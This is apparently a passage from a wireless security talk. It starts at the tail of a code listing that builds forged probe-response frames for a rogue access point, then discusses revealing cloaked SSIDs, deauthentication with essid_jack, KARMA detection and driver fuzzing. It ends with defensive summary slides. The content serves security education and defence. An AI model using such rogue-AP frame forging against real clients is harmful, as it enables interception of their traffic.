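        frames.append(build_mgmt(PROBE_RESP, client, rogue, rogue, leaked))
    return frames
```

Nothing in `reveal_cloaked_ssids` is an attack by itself; essid_jack only adds the deauthentication that makes the client send the probe request sooner. The KARMA detector is deliberately simple: real WIDS products also compare the claimed SSIDs against the authorized AP list and look at the BSSID’s vendor prefix, but the “answers everything” signature is the one that does not depend on either.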

Page 20

Client Drivers
• Basic secure programming rule: Sanitize all user input
• “Fuzzing” attacks send malformed or random data to software inputs
• Stuff that comes in over the air is user input – a malformed management frame reaches the driver before any authentication or encryption is involved
• 802.11n is around the corner – lots of new driver software going into production
• Are these well written? Well tested? Secure?

Summary

• At a minimum, you must put measures in place to control “uncontrolled wireless”
• Wireless networks are more secure than the average wired network
  • But only when properly secured
• Wireless security has evolved rapidly in the past 4 years – tools and information are not common knowledge
• Use vendors to help you – they live this every day

Page 21

Q & A

[email protected]

